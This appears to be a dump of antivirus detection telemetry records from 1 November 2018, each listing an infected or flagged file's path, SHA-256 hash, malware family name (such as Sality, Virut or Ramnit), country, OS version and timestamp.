  Row(detection=Row(filename='aapt.exe', filepath='F:\\FILES 1\\Micromax_D320\\Micromax_D320_V2_14.08.15_(by_xdafirmware.com)\\Micromax_D320_V2_14.08.15\\SN Write Tool v2.1444.00\\Android\\aapt.exe', filesize=2048000, name='W32/Sality.AT.#M1.#R1'), hash='371da97f1866bcdca21390e6247ecbd44a1114dab1606971060c12180bb24140', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe', parentsize=1426264, timestamp='2018-11-01T10:31:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='3778b8c6a30ea1bee29be3fbe259297f4d350b0bc7813191b2b48f653db1a54a', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\3778B8C6A30EA1BEE29BE3FBE259297F4D350B0BC7813191B2B48F653DB1A54A', filesize=1856000, name='HEUR/AGEN.1029502.#M1.#R1'), hash='3778b8c6a30ea1bee29be3fbe259297f4d350b0bc7813191b2b48f653db1a54a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:00:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='epsdneul.exe', filepath='D:\\SERVER_BENGKEL\\1.ADMBENG\\EPSON\\Apps\\DownloadNavigator\\EPSDNEUL.EXE', filesize=1232000, name='W32/Sality.AT.#M1.#R1'), hash='378e3c19e7cfcc8a5ea55ba2e8bf7e459b39eb818e4f7beb309c236a4b0c1f59', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:33:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='epsdneul.exe', filepath='D:\\SERVER_BENGKEL\\1.ADMBENG\\EPSON\\Apps\\DownloadNavigator\\EPSDNEUL.EXE', filesize=1232000, name='W32/Sality.AT.#M1.#R1'), hash='378e3c19e7cfcc8a5ea55ba2e8bf7e459b39eb818e4f7beb309c236a4b0c1f59', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:03:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='37e3355abaf8acf4a26f004c5af5fb2f27a77d912d7f74c3a7ad2762518342bc.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-15.available\\Avira\\37E3355ABAF8ACF4A26F004C5AF5FB2F27A77D912D7F74C3A7AD2762518342BC.VIR', filesize=1184000, name='TR/Dldr.Delphi.Gen.#M300.#R3195'), hash='37e3355abaf8acf4a26f004c5af5fb2f27a77d912d7f74c3a7ad2762518342bc', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T08:30:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pmc01000.exe', filepath='C:\\NOVA PASTA\\MCPED10\\PMC01000.EXE', filesize=8192000, name='W32/Sality.AT.#M1.#R1'), hash='380182af6edc88fb2739fc56adc81b54ee8cc5c35c623785e12f6816c076014f', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:36:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pmc01000.exe', filepath='C:\\NOVA PASTA\\MCPED10\\PMC01000.EXE', filesize=8192000, name='W32/Sality.AT.#M1.#R1'), hash='380182af6edc88fb2739fc56adc81b54ee8cc5c35c623785e12f6816c076014f', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:36:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='38320505ee418154e6c7e12ff537cb234a6f770835ba32ba557a856b3091212b.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-19.available\\Avira\\38320505EE418154E6C7E12FF537CB234A6F770835BA32BA557A856B3091212B.VIR', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='38320505ee418154e6c7e12ff537cb234a6f770835ba32ba557a856b3091212b', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T09:44:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='3887c3f48290daafc572577f74541c2363641c291a3e5c8bafe8b8139d65b716', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\3887C3F48290DAAFC572577F74541C2363641C291A3E5C8BAFE8B8139D65B716', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='3887c3f48290daafc572577f74541c2363641c291a3e5c8bafe8b8139d65b716', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:14:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='39227ec741c01dff7028b6bb6747e6b5ce71f470b46ae34504d42db16f31fa70', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-34\\39227EC741C01DFF7028B6BB6747E6B5CE71F470B46AE34504D42DB16F31FA70', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='39227ec741c01dff7028b6bb6747e6b5ce71f470b46ae34504d42db16f31fa70', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:51:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup.exe', filepath='E:\\Bakup BLHD-DLH Perizinan 2017 (30 Okt 2018)\\APKL UMUM sd-2014\\MIH TANAH BUMBU\\SLDH&MIH 2014\\BIMTEK-MIH2014-bjm\\BLHD\\gvSIG\\petaOS\\MapSource\\Setup.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='39416db910e525c872133ee57c5260bbce8f2face1c2ce950d98311dfee7ef64', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-01T11:14:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup.exe', filepath='\\\\?\\E:\\Bakup BLHD-DLH Perizinan 2017 (30 Okt 2018)\\APKL UMUM sd-2014\\MIH TANAH BUMBU\\SLDH&MIH 2014\\BIMTEK-MIH2014-bjm\\BLHD\\gvSIG\\petaOS\\MapSource\\Setup.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='39416db910e525c872133ee57c5260bbce8f2face1c2ce950d98311dfee7ef64', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:37:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='lmtools.exe', filepath='F:\\研究生简历\\商家爱玩\\新建文件夹\\尚素英\\新建文件夹\\软件\\CAD2008能用\\AutoCAD 2008安装包\\support\\nlm\\Program Files\\Autodesk Network License Manager\\lmtools.exe', filesize=1536000, name='W32/Ramnit.CD.#M1.#R1'), hash='395114ee221cd21e7a379d6b8270e1bda6eef2df8da115b89328276118d3b545', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe', parentsize=467408, timestamp='2018-11-01T13:13:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-192617-7294a1f1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c9a063d9\\AVSCAN-20181101-005657-94C4467B\\AVSCAN-20181101-192617-7294A1F1', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='398b9784731795a2a9159ae69dea840751d74fbe0f64b1e1929ea2fce6c6f138', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T18:24:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-163210-ade45c56', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c9a063d9\\AVSCAN-20181031-205810-8E73B4A7\\AVSCAN-20181101-163210-ADE45C56', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='398b9784731795a2a9159ae69dea840751d74fbe0f64b1e1929ea2fce6c6f138', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T15:32:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-161235-b162c3f1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c9a063d9\\AVSCAN-20181101-005657-94C4467B\\AVSCAN-20181101-161235-B162C3F1', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='398b9784731795a2a9159ae69dea840751d74fbe0f64b1e1929ea2fce6c6f138', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T15:10:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-195946-226cc217', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c9a063d9\\AVSCAN-20181031-205810-8E73B4A7\\AVSCAN-20181101-195946-226CC217', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='398b9784731795a2a9159ae69dea840751d74fbe0f64b1e1929ea2fce6c6f138', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T18:55:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ioce56244b8-37af-a04f-a3e8-9cd9e141fd72', filepath='C:\\ProgramData\\Kaspersky Lab\\AVP19.0.0\\Temp\\iocE56244B8-37AF-A04F-A3E8-9CD9E141FD72', filesize=512000, name='TR/Crypt.XPACK.Gen.#M300.#R2423'), hash='39b62c5ea53e09be29e305c074060ffae5087767274785bfaa0cf2d5dde581ad', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 19.0.0\\avp.exe', parentsize=619640, timestamp='2018-11-01T10:46:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mediaget_id3096279ids2s.exe', filepath='F:\\НОУТБУК\\разобрать\\MediaGet_id3096279ids2s.exe', filesize=660000, name='PUA/MediaGet.Gen5.#M300.#R400493'), hash='39f73a8cee4a757a42eaa24082c03e16779360d5999678ddcc079b88db6738da', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T18:34:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-233847-4b54a32e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0dd0b46a\\AVSCAN-20181101-233452-30025B13\\AVSCAN-20181101-233847-4B54A32E', filesize=660000, name='PUA/MediaGet.Gen5.#M300.#R400493'), hash='39f73a8cee4a757a42eaa24082c03e16779360d5999678ddcc079b88db6738da', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T18:38:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='downloadtool.exe', filepath='H:\\New folder\\CABLE PROJECT M10F Paid for_with_ph_no\\M10F_OpenCPU_GS4_SDK_V1.2\\downtools\\QFlash_V3.3\\QFlash_V3.3\\INT\\CH1\\DownloadTool.exe', filesize=1664000, name='W32/Neshta.A.#M1.#R1'), hash='3a234e56b0f515a8ce4c3c83a5ce9f8b24a535d8ca498ed4c3021105b7225ae3', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-01T16:47:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='downloadtool.exe', filepath='\\\\?\\H:\\New folder\\CABLE PROJECT M10F Paid for_with_ph_no\\M10F_OpenCPU_GS4_SDK_V1.2\\downtools\\QFlash_V3.3\\QFlash_V3.3\\INT\\CH1\\DownloadTool.exe', filesize=1664000, name='W32/Neshta.A.#M1.#R1'), hash='3a234e56b0f515a8ce4c3c83a5ce9f8b24a535d8ca498ed4c3021105b7225ae3', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:53:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='smp2.exe', filepath='C:\\ProgramData\\smp2.exe', filesize=512000, name='Adware/SpeedBit.3a2585.#M1.#R1'), hash='3a258512fe6ae76447e5d02fbda9411b516b70497817a46d31cbe8a1a80ab8fb', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:09:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='smp2.exe', filepath='C:\\ProgramData\\smp2.exe', filesize=512000, name='Adware/SpeedBit.3a2585.#M1.#R1'), hash='3a258512fe6ae76447e5d02fbda9411b516b70497817a46d31cbe8a1a80ab8fb', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:09:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='smp2.exe', filepath='C:\\Users\\All Users\\smp2.exe', filesize=512000, name='Adware/SpeedBit.3a2585.#M1.#R1'), hash='3a258512fe6ae76447e5d02fbda9411b516b70497817a46d31cbe8a1a80ab8fb', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:27:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='smp2.exe', filepath='C:\\ProgramData\\smp2.exe', filesize=512000, name='Adware/SpeedBit.3a2585.#M1.#R1'), hash='3a258512fe6ae76447e5d02fbda9411b516b70497817a46d31cbe8a1a80ab8fb', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:42:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='smp2.exe', filepath='C:\\ProgramData\\smp2.exe', filesize=512000, name='Adware/SpeedBit.3a2585.#M1.#R1'), hash='3a258512fe6ae76447e5d02fbda9411b516b70497817a46d31cbe8a1a80ab8fb', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:30:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='smp2.exe', filepath='C:\\ProgramData\\smp2.exe', filesize=512000, name='Adware/SpeedBit.3a2585.#M1.#R1'), hash='3a258512fe6ae76447e5d02fbda9411b516b70497817a46d31cbe8a1a80ab8fb', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:30:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='smp2.exe', filepath='C:\\ProgramData\\smp2.exe', filesize=512000, name='Adware/SpeedBit.3a2585.#M1.#R1'), hash='3a258512fe6ae76447e5d02fbda9411b516b70497817a46d31cbe8a1a80ab8fb', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:14:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='smp2.exe', filepath='C:\\ProgramData\\smp2.exe', filesize=512000, name='Adware/SpeedBit.3a2585.#M1.#R1'), hash='3a258512fe6ae76447e5d02fbda9411b516b70497817a46d31cbe8a1a80ab8fb', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:14:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='smp2[1].exe', filepath='c:\\users\\X\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\ek26l0ka\\smp2[1].exe', filesize=512000, name='HEUR/AGEN.1004048.#M1.#R1'), hash='3a258512fe6ae76447e5d02fbda9411b516b70497817a46d31cbe8a1a80ab8fb', metadata=Row(cmdline=None, country='GB', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:22:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-145508-909acb3b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_334756d5\\AVSCAN-20181101-144333-27AA0314\\AVSCAN-20181101-145508-909ACB3B', filesize=1152000, name='PUA/BitcoinMiner.#M1.#R1'), hash='3a5d39d3cacda3b817671ac907c5eeccaec5f073a57537e5d3cccba77a1cfdf1', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:25:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='firefox installer.exe', filepath='\\\\M-nas2016\\setup\\   PC-instal\\Firefox Installer.exe', filesize=128000, name='W32/Stanit.#M1.#R1'), hash='3a6640d7650a85d6b4029725c1d1c8be872c258553e760b91da2b831603b70bc', metadata=Row(cmdline=None, country='SK', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\totalcmd\\TOTALCMD64.EXE', parentsize=8560488, timestamp='2018-11-01T15:01:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp0000121e', filepath='C:\\Program Files (x86)\\F-Secure\\Anti-Virus\\aquarius\\tmp00001e63\\tmp0000121e', filesize=15360000, name='TR/Crypt.PEPM.Gen.#M300.#R4969'), hash='3aae9865e80d3c2443afe8c751664fdd09d51c0573a148c2b8f46fcb7b742830', metadata=Row(cmdline=None, country='KW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\F-Secure\\Anti-Virus\\fssm32.exe', parentsize=1078312, timestamp='2018-11-01T17:52:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered nilid', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nilid', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3acf7c1425fa9fe9629c4cdaf71a882083cd14a828265aa4a0a21ae3f083965b', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T06:13:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered nilid', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nilid', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3acf7c1425fa9fe9629c4cdaf71a882083cd14a828265aa4a0a21ae3f083965b', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T10:13:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered nilid', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nilid', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3acf7c1425fa9fe9629c4cdaf71a882083cd14a828265aa4a0a21ae3f083965b', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T04:13:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered nilid', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nilid', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3acf7c1425fa9fe9629c4cdaf71a882083cd14a828265aa4a0a21ae3f083965b', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T12:13:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered nilid', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nilid', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3acf7c1425fa9fe9629c4cdaf71a882083cd14a828265aa4a0a21ae3f083965b', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T08:13:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='กล้องโรงเรียน.exe', filepath='E:\\picture\\กล้องโรงเรียน\\กล้องโรงเรียน.exe', filesize=1088000, name='W32/Virut.Gen.#M1.#R1'), hash='3ad0facb991f342aff925aa8a1a60376eb55b63d0a79ffdfc88ff7951999ccb5', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T09:15:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='aidl.exe', filepath='K:\\TAB\\Lenovo_A3000H\\Lenovo_A3000H_MT6589_A422_003_014_130909\\Lenovo_A3000H_MT6589_A422_003_014_130909\\SN Write Tool v2.1504.00\\Android\\aidl.exe', filesize=1472000, name='W32/Sality.AT.#M1.#R1'), hash='3af5690cefb52b2ccdc69fb604f231a6c85573e82ef01a8fa2813ed12f5ad187', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe', parentsize=1426264, timestamp='2018-11-01T09:29:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='audiodg.exe', filepath='C:\\Windows\\System32\\audiodg.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='3b58968ace2221c198fc27a603e9be8a9e8d8d2f4b9a59e450602286a87ad694', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:39:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='audiodg.exe', filepath='C:\\Windows\\System32\\audiodg.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='3b58968ace2221c198fc27a603e9be8a9e8d8d2f4b9a59e450602286a87ad694', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:39:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wuauclt.exe', filepath='C:\\Windows\\System32\\wuauclt.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='3bbcddfbcb55c2d2e07841ad444d207fef8aad19af1ad587835534f57b500ec6', metadata=Row(cmdline='-k netsvcs', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T11:40:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wuauclt.exe', filepath='C:\\Windows\\System32\\wuauclt.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='3bbcddfbcb55c2d2e07841ad444d207fef8aad19af1ad587835534f57b500ec6', metadata=Row(cmdline='-k netsvcs', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T11:25:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wuauclt.exe', filepath='C:\\Windows\\System32\\wuauclt.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='3bbcddfbcb55c2d2e07841ad444d207fef8aad19af1ad587835534f57b500ec6', metadata=Row(cmdline='-k netsvcs', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T11:32:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='folder settings .exe', filepath='\\?\\J:\\العاب\\AirXonix1\\Folder Settings\\Folder Settings .exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='3bc9497f91f9f797fbcd5cbcea1d89ecc1388ad844c801ad5043b87f26e51950', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:45:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmpvm2zunum', filepath='/tmp/tmpvm2zunum', filesize=15296000, name='W32/Stanit.#M0.#R0'), hash='3bcf5fb435ca26bf184e2e35c3f7b3ae70e64622ad6da6f74ec01236607b8cbe', metadata=Row(cmdline=None, country='US', os_name='Linux', os_vmajor='8', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T14:16:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T02:14:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T01:32:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T03:48:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T03:41:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T00:54:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T01:24:04Z'), dt=datetime.date(2018, 11, 1)),
